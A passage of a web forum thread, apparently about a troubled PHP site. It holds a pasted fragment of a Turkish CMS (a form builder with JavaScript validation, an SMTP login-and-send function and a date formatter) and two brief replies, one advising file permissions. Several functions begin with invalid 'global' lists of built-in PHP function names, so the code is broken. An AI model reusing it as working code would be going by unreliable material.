(!document.getElementById('gf_".$k[1]."').options[document.getElementById('gf_".$k[1]."').selectedIndex].value && !stop) { alert('\"".$k[0]."\" "._lang_formJSError_bilgisiniSecin."');\n document.getElementById('gf_".$k[1]."').focus(); \n stop=true; } \n";break;case "CHECKBOX": $out.='<input id="gf_'.$k[1].'" type="checkbox" name="data_'.$k[1].'">&nbsp;'.$labelCheckBox;break; case "TELEPHONE":list($alanKodu,$tel) = explode('-',$data[$k[1]]); $out.='<input size="2" id="gf_'.$k[1].'_alanKodu" '.$status.' type="text" name="tel_'.$k[1].'_alanKodu" value="'.$alanKodu.'"> - <input size="11" id="gf_'.$k[1].'_tel" '.$status.' type="text" name="tel_'.$k[1].'_tel" value="'.$tel.'">'; if ($k[5] == 1) $generateCheckJS.="if ((!document.getElementById('gf_".$k[1]."_alanKodu').value || !document.getElementById('gf_".$k[1]."_tel').value) && !stop) { alert('\"".$k[0]."\" "._lang_formJSError_bosBirakilamaz."');\n document.getElementById('gf_".$k[1]."_alanKodu').focus(); \n stop=true; } \n";break; } $out.='</td></tr>';} }$generateCheckJS .="if (!stop) document.getElementById('$formID').submit(); } </script>"; $addJS = '<script>'.$addJS.'</script>'; $out.='<tr><td colspan="2"></td><td><span onClick="'.$formID.'();" class="button"><img src="templates/'.$siteConfig['templateName'].'/images/form_Gonder.gif"></span></td></form></table>'."\n";$out.=$generateCheckJS.$addJS; return $out;} function authSendEmail($from, $namefrom, $to, $nameto, $subject, $message, $headers){ global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $smtpServer = $siteConfig['SMTP_server']; $port = $siteConfig['SMTP_port']; $timeout = "30"; $username = $siteConfig['SMTP_username']; $password = $siteConfig['SMTP_password']; $localhost = "localhost"; $newLine = "\r\n"; $smtpConnect = fsockopen($smtpServer, $port, $errno, $errstr, $timeout); $smtpResponse = fgets($smtpConnect, 515); if(empty($smtpConnect)){$output = "Failed to connect: $smtpResponse";return $output; } else {$logArray['connection'] = "Connected: $smtpResponse"; } fputs($smtpConnect,"AUTH LOGIN" . $newLine); $smtpResponse = fgets($smtpConnect, 515); $logArray['authrequest'] = "$smtpResponse"; fputs($smtpConnect, base64_encode($username) . $newLine); $smtpResponse = fgets($smtpConnect, 515); $logArray['authusername'] = "$smtpResponse"; fputs($smtpConnect, base64_encode($password) . $newLine); $smtpResponse = fgets($smtpConnect, 515); $logArray['authpassword'] = "$smtpResponse"; fputs($smtpConnect, "HELO $localhost" . $newLine); $smtpResponse = fgets($smtpConnect, 515); $logArray['heloresponse'] = "$smtpResponse"; fputs($smtpConnect, "MAIL FROM: $from" . $newLine); $smtpResponse = fgets($smtpConnect, 515); $logArray['mailfromresponse'] = "$smtpResponse"; fputs($smtpConnect, "RCPT TO: $to" . $newLine); $smtpResponse = fgets($smtpConnect, 515); $logArray['mailtoresponse'] = "$smtpResponse"; fputs($smtpConnect, "DATA" . $newLine); $smtpResponse = fgets($smtpConnect, 515); $logArray['data1response'] = "$smtpResponse";fputs($smtpConnect, "To: $to\nFrom: $from\nSubject: $subject\n$headers\n\n$message\n.\n"); $smtpResponse = fgets($smtpConnect, 515); $logArray['data2response'] = "$smtpResponse"; fputs($smtpConnect,"QUIT" . $newLine);$smtpResponse = fgets($smtpConnect, 515); $logArray['quitresponse'] = "$smtpResponse"; }function showDate($dateStr) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  list($date,$time) = explode(' ',$dateStr); list($y,$m,$d) = explode('-',$date); return $d.'.'.$m.'.'.$y.' '.$time;} if ($_GET['ajaxReq']) usleep(400000);?>
 
0
 

Right... Care to elaborate?

 
0
 

Also check the permissions on the files and folders on you site. ideally you want the permissions to be 0644 on files and 0755 on folders.

You
This article has been dead for over six months: Start a new discussion instead
Post:
Start New Discussion
View similar articles that have also been tagged: